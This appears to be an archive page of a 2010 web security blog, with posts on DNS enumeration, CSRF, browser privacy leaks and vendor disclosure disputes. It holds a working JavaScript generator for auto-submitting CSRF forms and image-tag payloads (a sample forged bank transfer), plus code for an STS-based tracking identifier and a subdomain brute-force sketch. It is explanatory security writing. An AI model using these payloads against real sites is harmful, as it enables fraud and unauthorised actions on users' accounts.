web application security lab

Archive for the 'Webappsec' Category

Fierce 2.0 To Be Released

Thursday, June 10th, 2010

A few years back I wrote a tool to do DNS enumeration. The point was that it's incredibly difficult to do an accurate penetration test against a target when you don't know what to attack. The only way to know is to find all the machines associated with that domain, customer, or whatever. After a weekend or so of coding I came up with a functional, albeit crappy, Perl program that did just that. A few people took note, a lot of people called me out (rightfully) for my crappy programming, and ultimately it sat nearly stagnant for a few years. That is, until I met Jabra.

Jabra (who works for Rapid7) is a badass Perl developer, at least compared to yours truly. He completely rewrote Fierce, taking in my wish-list and a whole new set of features he wanted, like XML support to quickly integrate with nmap and all kinds of other stuff. Hopefully sometime next week we'll have a released version. In the meantime please go check out the beta of Fierce 2.0. Feedback is welcome!
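For the curious, the core idea is simple enough to sketch in a few lines. This is not Fierce's actual code - just a toy illustration of the brute-force half of DNS enumeration, with a made-up wordlist and an injected resolver so a real one (e.g. Node's dns module) could be wired in:

```javascript
// Toy sketch of what a DNS enumeration tool automates: try common
// hostnames under a target domain and keep the ones that resolve.
// The resolver is injected so it can be swapped for real DNS lookups.
function enumerate(domain, words, resolve) {
  const found = [];
  for (const word of words) {
    const host = `${word}.${domain}`;
    const ips = resolve(host); // array of IPs, or null on NXDOMAIN
    if (ips && ips.length) found.push({ host, ips });
  }
  return found;
}

// Demo with a fake resolver standing in for real DNS:
const fakeResolve = h => (h === "www.example.com" ? ["93.184.216.34"] : null);
console.log(enumerate("example.com", ["www", "mail", "vpn"], fakeResolve));
```

The real tool adds the parts that matter in practice - zone transfer attempts, reverse lookups on nearby IP ranges, and so on - but the wordlist loop is the heart of it.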

Windows Help Centre Vuln

Thursday, June 10th, 2010

Updated: clarified some points of contention.

Early this morning Google's Tavis Ormandy published a vulnerability in the hcp protocol handler. It allows an attacker to run arbitrary commands as the user. In practice it created a lot of alerts and warnings for me - but the XP install I was using is somewhat locked down, so I'm not sure how practical this attack would be over any other attack that causes an alert, as the article mentions. Later his report says it works around the alerts (I couldn't reproduce that, but that was his intention). Either way, this is some pretty amazing research. However, there are some odd things about it that really struck me the wrong way.

Google has been the loudest proponent of responsible disclosure in the past. But if you look at the dates in his post, he says he reported it to Microsoft on the 5th of June (a Saturday), who responded the same day. He sent the advisory early in the morning today, the 10th of June - meaning Google gave Microsoft less than 5 days to respond to his demand to have it fixed in 60 days. Even Mozilla backed down from a 10 day turnaround, and they're only running a single software suite. And it's not like Tavis was acting on his own - he credits lcamtuf, who works at Google. So apparently it's okay for Google's employees to go full disclosure, but not for other researchers. The hypocrisy is amazing.

See, here's the big problem. Either you are all about full disclosure (which is happening less and less these days), you use it only when you know the company won't react otherwise or does all kinds of other hinky things behind your back (the same reason I advocate full disclosure against Google), or you use responsible disclosure. Google says it adheres to responsible disclosure, but at the same time they give Microsoft 5 days to agree to a 60 day patch cycle for exploit code that Google's researchers themselves created! From Google's own website:

This process of notifying a vendor before publicly releasing information is an industry standard best practice known as responsible disclosure. Responsible disclosure is important to the ecology of the Internet. It allows companies like Google to better protect our users by fixing vulnerabilities and resolving security concerns before they are brought to the attention of the bad guys. We strongly encourage anyone who is interested in researching and reporting security issues to observe the simple courtesies and protocols of responsible disclosure. Our Security team follows the same procedure when we discover and report security vulnerabilities to other companies.

… except when you don't. Then Tavis puts a patch up on a domain that, no offense to Tavis, sounds sketchier than a lot of malware sites out there. There is evidence that it doesn't even work in some cases, though it did appear to work against the one PoC Tavis put up in the test I ran. I don't know, the whole thing just rubbed me the wrong way. But at least now no one has to pretend to do responsible disclosure with Google just because it's the right thing to do - they don't use it themselves. Even when MS finds a vuln in Google, they do so responsibly. I don't mean to say anything bad about Tavis, because he's probably a good guy with a lot of skill. But let's stop pretending Google's team is chivalrous, shall we? Let's see what Google does when one of their own breaks their stated policies, whether the researcher is working on their own time or not.

Just Another Day at

Friday, April 16th, 2010

I don't think I need to introduce this email - it speaks for itself:

Valued Road Runner Business Class Customer,

This email is in regards to the Time Warner (Road Runner) account for the following location


The Road Runner Abuse Control Department has received a complaint of network abuse originating from a computer connected to your cable modem. We recognize that most Internet abuse complaints are the result of computers infected with viruses/worms or compromised by a trojan horse (a.k.a. "trojan" for short). Trojans allow malicious third parties to gain access to your system(s) for the purpose of using your Internet connection to intentionally commit the abuse in question. The abuse commonly comes in the form of either unsolicited email (a.k.a. "spam") or port scanning (connection attempts to other systems across the Internet for the purpose of finding vulnerable systems to infect or exploit). However, if not addressed in a timely manner, your machine(s) potentially may be used for other more illegal activities.

A portion of the complaint we have received is copied below for your review:

|date                     |id     |virusname        |ip |domain |Url|
|2010-04-14 02:20:04 CEST |514019 |unknown_html_RFI |   |       |   |


If you recognize this activity and it was intentionally sent, you may be in violation of our Acceptable Use Policy (AUP) and it's important that you contact us immediately to discuss. If you do not recognize this, you likely have a compromised or infected system connected to your cable modem and will need to take action to clean and secure all Internet connected-computers as soon as possible. We take these complaints very seriously and further substantiated complaints could, at some point, require us to disable your cable modem in an effort to protect the integrity of our network. We obviously have no desire to interfere with your ability to conduct business and would prefer to not take such action, so please pursue whatever measures are necessary (up to and including the formatting of hard drives and/or assistance from a third party IT professional) to correct the problem with due urgency.

If it would be helpful, Road Runner does offer free anti-virus and firewall software for commercial use. You will need your Road Runner account information to register the software, so you may need to contact your local Time Warner office for assistance. For more information, please visit the following link:

Additionally, we have a suggested course of action on our Website, but please be aware that it is intended for use by residential customers to clean a single computer and may not be feasible for use in a commercial environment. Moreover, some of the suggested software is licensed for personal use only. We cannot accept responsibility for compliance with software licenses, so please be aware of rules and restrictions related to the installation and use of any applications suggested. If interested in this course of action, please visit the following link:

http://www.rrsecurity-abuse.com

If you have a network connected via a router, you may be able to view the router logs, looking for either a large amount of email activity or the port scanning activity specified above. This may indicate which computer is the offending system and thus help you simplify the solution.

The corrective action taken is entirely your responsibility. We are merely making contact to alert you to the problem in an effort to both protect our network and enforce our policies. But we ask that you do take corrective action as soon as possible and contact us to advise, preferably by simply replying to this email. Also feel free to contact us with any questions you have regarding this issue.

Thank You,
Time Warner Cable (Road Runner) Abuse Control, Regional Office

I didn't realize 2 lines of completely benign JavaScript that can be included on websites is now considered abusive. I can't wait until someone adds Google AdSense as unknown_html_RFI. If you know who submitted this, please smack them upside the head for me and then sit them down and help them find a job that doesn't require a keyboard. kthanksbye.

CSRF Isn’t A Big Deal - Duh!

Wednesday, April 14th, 2010

Did you hear the news? CSRF isn’t a big deal. I just got the memo too! There were a few posts pointing me to an article on the fact that CSRF isn’t that big of a deal. Fear not, I am here to lay the smack down on this foolishness. To be fair, I have no idea who this guy is, and maybe he’s great at other forms of hacking - web applications just don’t happen to be his strong point. Let’s dissect the argument, just to be clear:

Even with some of the best commercial Web vulnerability scanners, it’s very rare that I find cross-site request forgery (CSRF). That doesn’t mean it’s not there. Given the complexity of CSRF, it’s actually pretty difficult to find.

Huh? It's difficult to find with a scanner, so therefore it's difficult to find, period? Noooo… almost every single form on the Internet is vulnerable to it unless it's using a nonce. Just because scanners have a tough time dealing with it doesn't mean it's hard for a human to find. If you set down your scanner and do a manual pentest once in a while, you'll find that nearly every site is vulnerable in multiple places (.NET sites with encrypted ViewStates are about the only ones that don't regularly have this problem).

The good news is it’s even more difficult to exploit CSRF which essentially takes advantage of the trust a Web application has for a user.

What the?! Difficult to exploit? If writing HTML and/or JavaScript is difficult, sure. However, if you have even the slightest idea of how to create a form and a one-liner of JavaScript to submit it - or, even worse, a single image tag in a lot of cases - it's not difficult. It's not even mildly challenging. The only hard part is getting the user to click on the page with the payload, but even that should be kitten play in almost all cases through web-boards, spear phishing and the like. Getting people to click on links is insanely easy. Maybe I'm not getting the difficult part. Also, that is a terrible way to think about CSRF - it's not always about trust, it's about getting another user to commit an action on your behalf. Trust is only involved in some instances of CSRF - there are many, many examples that have nothing to do with user credentials.
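To show how little "exploit development" is involved, here's a sketch of generating the two classic payloads. The target URL and field names are made up for illustration - the point is that the whole attack is a few lines of string building:

```javascript
// CSRF payload generation sketch. Given a target form's action URL and
// field values, emit a page that auto-submits the forged POST on load.
// (bank.example.com and the field names are hypothetical.)
function csrfPayload(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) => `<input type="hidden" name="${name}" value="${value}">`)
    .join("\n    ");
  return `<form id="f" method="POST" action="${action}">
    ${inputs}
  </form>
  <script>document.getElementById("f").submit();</script>`;
}

// For GET-based state changes, a single invisible image tag is enough:
function csrfImage(url) {
  return `<img src="${url}" width="1" height="1">`;
}

console.log(csrfPayload("https://bank.example.com/transfer",
                        { to: "attacker", amount: "1000" }));
```

Host the output on any page the victim visits while logged in to the target site, and the victim's browser sends the request with their cookies attached. That's the entire "difficulty."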

So, based on what I’m seeing in my work I don’t think CSRF is as big of a deal - or perhaps I should say as top of a priority.

No, it's not top priority compared to something like SQL injection or command injection. But yes, it's very much a big deal. Last week I did an assessment where one of the CSRF attacks would allow me to create a new admin user in the system. A huge percentage of the fraud on the Internet (TOS fraud, not actual hacking) is related to CSRF abuse (click fraud, affiliate fraud, etc…). We're talking about hundreds of millions of dollars lost to a single class of exploit, and only in those two variants. Like lots of exploits, it totally depends on the problem at hand. Sorry, folks, CSRF is not getting downgraded just because a piece of software can't find the issue for you.

Chrome Phishing

Wednesday, April 14th, 2010

Following an interview with Eric Schmidt, Securosis did a little writeup on how Google's switch to Chrome as a secure alternative to anything else is rather short-sighted. I think some people think I'm just speculating when I talk about how browsers tend to make the same mistakes over and over again without learning the lessons of their predecessors. No, that's not idle speculation. Eric Schmidt said they want to be held accountable for how much more secure their website and web technologies are. Alright… if you say so, Eric.

Reaching into my grab bag of Chrome issues, let me pull out the oldest, lamest one I can, just as a proof of concept:

There is a long-ago-patched bug that phishers used many years back to create targeted phishing links that could fool the eye. By putting the name of the site in question in the basic authentication field of the URL, they could make people think they were clicking on something they weren't. Mind you, this has been patched for years in Firefox. Chrome? Not so much. The following was tested in Chrome on Vista.

The reason modern "new" browsers aren't as good for security comes down to precisely two things: 1) they haven't completely figured out their security model, and 2) they don't go back, read about all the hard-learned lessons of their kin, and build those lessons in. Basing your entire security model on an unproven browser that JUST had a dozen holes uncovered a few days ago is foolhardy at best. So, yes, Eric - I'm sorry to say, you are building your new security posture on a house of cards, and everyone who uses Google, Chinese dissidents or otherwise, is at the mercy of that decision.

Chrome Fixes STS Privacy Issue

Tuesday, April 13th, 2010

I'm always interested in finding ways to leak private information out through browsers. For those who aren't aware of it, there's a new technology called "Strict Transport Security" (STS for short) that pins a browser into using SSL/TLS for all further connections with the site in question. The goal is to reduce the risk from tools like SSLStrip that downgrade you to HTTP instead of HTTPS. However, a somewhat bad privacy issue was created as a result:

Imagine a scenario where you have one website that a user is interacting with (say an evil advertising empire intent on tracking people for marketing purposes).

On that SSL/TLS enabled website there is a series of iframes. Each iframe leads to a different HTTP (not HTTPS) server. The first iframe (call it frame00) is the "check" to see if the user has been to the site before. It automatically redirects the user to the HTTPS site via a 301 redirect. The fact that the user hit the HTTP site at all means they haven't been there before, which brings us to the first use case:

Use case 1) If the user has not been to the evil website before (which can be detected because the user will hit the HTTP version of frame00 before being redirected to the STS-enabled SSL/TLS version of that subdomain), a series of iframes selectively turns STS on and off on each subdomain. Each subdomain essentially provides one bit of information, and collectively those bits map to a user profile in the database. For instance frame01 = STS, frame02 = HTTP, frame03 = STS, frame04 = STS … could map to binary 1011 = decimal 11, i.e. the 11th user to visit the site. The number of iframes required is based on the total number of users the site believes it will need to track over its lifetime - 33 iframes would provide enough bits for the ~1.7bn Internet users.

Use case 2) If the user has been to the site before, they will not hit the HTTP site on frame00 (the "check" subdomain); since they are instead immediately sent to the STS site, the evil website can begin to calculate who that user corresponds to. By pointing every frame at the HTTP site (not the STS-enabled SSL/TLS site) and seeing which ones go to the HTTPS site instead, the evil site can map those bits back to the corresponding user it has seen before.
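The bit-channel arithmetic behind the scheme is straightforward. Here's a sketch (the frame/subdomain names are implied, not real; this just shows the encode/decode math):

```javascript
// Each of N subdomains carries one bit: STS pinned = 1, plain HTTP = 0.
// 33 bits is enough to give every one of ~1.7bn users a unique ID.

// First visit: decide which subdomains to pin for visitor number `id`.
// frame01 carries the most significant bit, matching the example above.
function stsBitsFor(id, frames) {
  const bits = [];
  for (let i = frames - 1; i >= 0; i--) {
    bits.push(Math.floor(id / 2 ** i) & 1);
  }
  return bits;
}

// Return visit: rebuild the ID from which frames forced HTTPS.
function userIdFrom(bits) {
  return bits.reduce((id, bit) => id * 2 + bit, 0);
}

// The 11th visitor from the example: STS, HTTP, STS, STS -> binary 1011.
console.log(stsBitsFor(11, 4));        // [1, 0, 1, 1]
console.log(userIdFrom([1, 0, 1, 1])); // 11
```

The nasty part is that the "storage" is the browser's STS pin list itself, which survives cookie clearing - that's what made it a privacy issue worth fixing.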

This is one of those unfortunate examples where a good idea introduces another security flaw. The fix isn't great, though - it basically reduces the effectiveness of STS in the first place by making it easier for the user to clean out. The whole point of STS is to pin the browser to a secure connection. Either that's important to do or it isn't. If it isn't, STS shouldn't exist; if it is, it shouldn't be cleaned. Either way, I don't think STS will provide a lot of value without some more thinking. But for now it's a good chance for companies to play with a new way of securing their sites from man-in-the-middle attacks. Firefox is planning to implement this soon as well. Overall, I was pretty happy with how Google handled and fixed the bug, along with the dozen or so other bugs reported to them during the bug hunting contest. Hopefully Google will continue to increase their diligence around privacy issues in their products.

AT&T UMTS JS Injection

Monday, April 12th, 2010

This isn't exactly an exploit, but I'm sure after reading it some people will feel like it is, or at minimum it might make them uncomfortable. It appears that when users connect through AT&T UMTS wireless cards, the system man-in-the-middles the connection: not only does it downgrade image quality for performance reasons, it also injects a piece of JavaScript hosted at an address that isn't live on the public Internet. If you're anything like me and you see a piece of JS show up in a website of yours that you know has no JS on it at all, you're thinking you're owned at this point. Alas, you probably are owned, but it's in an effort to save your bandwidth. You can download a zipped copy of this JavaScript file here.

The real questions are when and how this page gets cached, who owns it when it's not being MITM'd (when you switch from UMTS to another network), and on and on. Incidentally, I tried to do directory traversal to see what else might be on that server, and it banned me from going there - and from the JavaScript file - for the rest of the session. Why? Probably to stop guys like me from hacking whatever server that is and MITMing everyone on AT&T's UMTS network. Clearly reducing the size of the page is good for them, and is good for some percentage of users who don't care about the potential issues here. And for the rest of us, we'll continue to tunnel our traffic so we can avoid AT&T's MITM craziness.

Update: a few people have sent me a link showing that this is happening on other networks as well.

Mavituna Security’s Netsparker Community Edition

Friday, April 9th, 2010

For the pen-testers out there, you may be interested in this. Mavituna Security recently announced a free "community edition" of their scanner, Netsparker. For those who haven't played with it yet, it's pretty slick in one very important way for manual penetration testers: if it finds something like blind SQL injection or command injection, it lets you use the tool itself as a pivot to continue the assessment after that initial compromise. Pretty cool idea, and if you check the website, Ferruh has put up some good movies showing how powerful that can be. This is one very good difference between a vulnerability assessment and a penetration test.

The community edition can be found here. It's definitely a great tool for those who want to perform assessments on the cheap or try before they buy. Other scanners have gone this route in the past (e.g. Acunetix), and I think it's a great way to show off the goods. I'm sure he and his team would appreciate feedback.

MalaRIA Malicious RIA Proxy

Tuesday, April 6th, 2010

I got an email from Erlend Oftedal about a new tool he's created called MalaRIA. The tool abuses weak crossdomain.xml and clientaccesspolicy.xml policies (so both Flash and Silverlight) to let a piece of code on his server use the client's machine as a proxy to read information off other websites that are protected in other ways. Think of it as an RIA version of BeEF.
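For reference, the kind of wide-open Flash policy the tool abuses looks something like this (a hypothetical crossdomain.xml; the Silverlight clientaccesspolicy.xml equivalent is analogous):

```xml
<?xml version="1.0"?>
<cross-domain-policy>
  <!-- domain="*" lets ANY site's Flash content read responses from this
       domain with the victim's cookies attached - this is the dangerous part -->
  <allow-access-from domain="*" />
</cross-domain-policy>
```

Scope that wildcard down to the specific domains that actually need cross-domain access and the MalaRIA-style proxying stops working against your site.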

You can read his blog post here or if you’re the visual type you can check out his movie here. We often talk about why poorly written crossdomain.xml files are dangerous, but I think this puts the last nail in that coffin. Yes, it’s dangerous. For real. Incidentally there is no reason you couldn’t deliver a MalaRIA payload over BeEF as well, if you wanted the best of both worlds. Nice job by Erlend!

Update: code available here.

Mozilla Plans Fix for CSS History Hack

Wednesday, March 31st, 2010

It’s with mixed emotion that I write this. The CSS history hack is soon going to close. If you look at the original Bugzilla thread this is something that Mozilla had marked as a P1 bug since 2002. You heard me right, this P1 bug has been open for 8 years. And here we are, on the cusp of an actual fix. Why do I have mixed emotion? You’d think I’d be doing back flips since we’re finally going to see an end to this. Well… the problem is we won’t.

The first problem is that this is only Mozilla - a minority of all users. Second, of all the hacks we have at our disposal, this is just information leakage. In fact, I recently wrote a letter, as did a handful of other security researchers, and I marked this only third out of five in importance to fix. Worse yet, the patch doesn't actually fix the problem: there are still other timing-based attacks that get at the same information. So while it's great that we're finally fixing an 8-year-old P1 bug, it's not like the problem is gone - we've just removed one vector. The bad guys still have others at their disposal.

I know a lot of people will think I'm being a little harsh, but let's take a real exploit here for a second - CSRF. You're going to tell me, "Browsers can't fix CSRF - that's up to websites to fix. They should use nonces on every page." Sure… but before this fix came out, Mozilla was saying the same thing about the CSS history hack - the browser isn't at fault, the spec is:

This might be a reasonable stopgap to check in just in case some big flap comes up, although since MS is also vulnerable, and it’s really the spec’s fault we might not come under great pressure to fix this immediately.

Yes, the spec is at fault, and yes, websites could protect themselves from the CSS history hack by also using nonces with a keyspace large enough that computing a valid link is computationally infeasible. Funny how both these exploits have the same fixes: a) create nonces on every page on the Internet that has any sensitivity, or b) fix the browser. That quote is pretty telling - without pressure from the community there's no way we're going to get any of this stuff fixed, because the browsers will default to whatever the poorly written spec says to do. So let's not pat ourselves on the back too much here - it seems that with every hole fixed, two more pop up, and even once identified they take way too long to fix. I don't mean to harp on the Mozilla guys too much - at least they have a fix in the works. But that doesn't change the fact that we appear to be playing a very losing game of whack-a-mole.